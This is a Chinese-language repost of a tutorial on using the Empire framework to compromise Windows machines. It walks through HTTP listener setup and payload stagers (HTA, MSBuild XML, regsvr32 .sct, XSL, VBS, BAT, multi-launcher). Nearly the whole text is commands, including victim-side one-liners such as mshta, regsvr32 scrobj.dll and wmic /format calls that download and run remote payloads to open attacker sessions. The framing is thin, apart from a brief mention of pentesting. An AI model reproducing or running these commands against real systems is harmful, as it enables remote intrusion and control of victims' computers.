通過HTA開發
這種攻擊有助于我們通過.hta利用Windows,當通過mshta.exe運行.hta檔案時,它將以具有相似功能的.exe檔案執行,這使我們無法破解,要了解有關此攻擊的更多資訊,請單擊此處,
運行型別
./empire
根據作業流程,首先,我們必須創建一個偵聽器以偵聽我們的本地計算機,鍵入以下命令:
listeners
運行上面的命令后,它將說“當前沒有偵聽器處于活動狀態”,但是不用擔心,我們現在進入偵聽器界面,因此,在此偵聽器界面中,輸入:
uselistener http
set Host http://192.168.1.107
execute
現在已經創建了偵聽器,在偵聽器界面中鍵入“ back”以創建漏洞利用程式,為此,請輸入:
usestager windows/hta
set Listener http
set OutFile /root/1.hta
execute
運行以上命令將創建一個.hta檔案以用作惡意軟體,使用以下命令啟動python服務器,以共享我們的.hta檔案:
python -m SimpleHTTPServer 8080
隨著python服務器啟動并運行,請在受害者的命令提示符下鍵入以下命令以執行我們的惡意檔案:
mshta.exe http://192.168.1.107:8080/1.hta
執行以上命令后,您將擁有會話,以訪問會話型別:
interact XDGM6HLE
sysinfo
通過MSBuild.exe利用
我們的下一個漏洞利用是通過MSBuild.exe,它將使您可以使用XML檔案進行Windows的遠程會話,要了解有關此攻擊的詳細資訊,請單擊此處,并使用以下漏洞利用型別:
listeners
uselistener http
set Host http://192.168.1.107
execute
這將創建一個偵聽器,在偵聽器界面中鍵入“ back”以創建一個利用程式,為此,請輸入:
usestager windows/launcher_xml
set Listener http
execute
現在,在/ tmp中創建一個xml檔案,將此檔案復制到受害人的PC中(在Microsoft.NET \ Framework \ v4.0.30319 \中),然后鍵入以下命令,運行該檔案:
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml
因此,通過這種方式,您可以進行會話,以訪問所述會話型別:
interact A8H14C7L
sysinfo
通過regsvr32開發
我們的下一個方法是通過regsvr32進行利用,要詳細了解此攻擊,請單擊此處,與往常一樣,我們必須先創建一個監聽器才能監聽我們的本地計算機,鍵入以下命令:
listeners
uselistener http
set Host http://192.168.1.107
execute
現在已經創建了偵聽器,在偵聽器界面中鍵入“ back”以創建漏洞利用程式,為此,鍵入:
usestager windows/launcher_sct
set Listener http
execute
這將在/ tmp中創建一個.sct檔案,使用python服務器將此檔案共享到受害者的PC,然后通過鍵入以下命令在受害者的PC的運行視窗中運行此檔案:
regsvr32.exe /u /n /s /i:http//192.168.1.107:8080/launcher.sct scrobj.dll
因此,您將有一個活動的會話,要訪問會話型別:
interact <session name>
sysinfo
通過XSL開發
XSL是一種可以幫助您格式化資料的語言,它還描述了Web服務器如何使用XML進行互動,我們對帝國的下一種攻擊方法是利用.xsl檔案,對于此方法,首先輸入以下命令激活我們的偵聽器:
listeners
uselistener http
set Host http://192.168.1.107
execute
偵聽器啟動并運行后,創建您的利用程式:
usestager windows/launcher_xsl
set Listener http
execute
這樣,將創建.xsl檔案,現在從創建.xsl檔案的檔案夾中運行python服務器,如下圖所示:
cd /tmp
python -m SimpleHTTPServer 8080
現在,在受害者的命令提示符下執行以下命令:
wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"
在上面運行將提供一個會話,以訪問該會話型別:
interact <session name>
sysinfo
通過Visual Basic腳本利用
我們的下一個方法是創建一個惡意VBS檔案并通過它利用我們的受害者,像往常一樣,讓我們??先創建一個監聽器,
listeners
uselistener http
set Host http://192.168.1.107
execute
現在,創建我們的惡意.vbs檔案型別:
usestager windows/launcher_vbs
set Listener http
execute
下一步是通過鍵入以下命令來啟動python服務器:
python -m SimpleHTTPServer 8080
.vbs檔案通過python服務器共享并在受害者的PC中執行后,您將擁有會話,就像訪問會話型別之前一樣:
interact <session name>
sysinfo
通過bat檔案利用
在這種方法中,我們將通過.bat檔案進行利用,就像我們之前的漏洞利用一樣,這次也創建一個偵聽器,為此,鍵入:
listeners
uselistener http
set Host http://192.168.1.107
execute
back
上面的命令將為您創建一個偵聽器,讓我們使用以下命令創建.bat檔案:
usestager windows/launcher_bat
use Listener http
set OutFile /root/1.bat
execute
如圖所示,以上命令將創建一個.bat檔案,使用以下命令啟動python服務器,以允許您在受害者的PC上共享.bat檔案,
python -m SimpleHTTPServer 8080
運行.bat檔案后,將激活一個會話,要訪問會話型別:
interact <session name>
sysinfo
多發射器
這是本文的最后一種方法,可以再次在各種平臺(例如Windows,Linux等)上使用它,即使對于這種方法,也可以創建一個偵聽器:
listeners
uselistener http
set Host http://192.168.1.107
execute
然后鍵入以下命令來創建您的惡意檔案:
usestager multi/launcher
set Listener http
execute
在上述命令后按Enter鍵,它將為您提供代碼,復制此代碼并將其粘貼到受害者的命令提示符中,然后按Enter,按下Enter鍵后,您將激活一個會話,要訪問會話,請輸入:
interact <session name>
sysinfo
結論
以上是可用于利用不同漏洞利用Windows的方法,使用此框架是Metasploit之后筆測驗技巧的補充,請享用!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/121831.html
標籤:其他
上一篇:Empire基本使用方法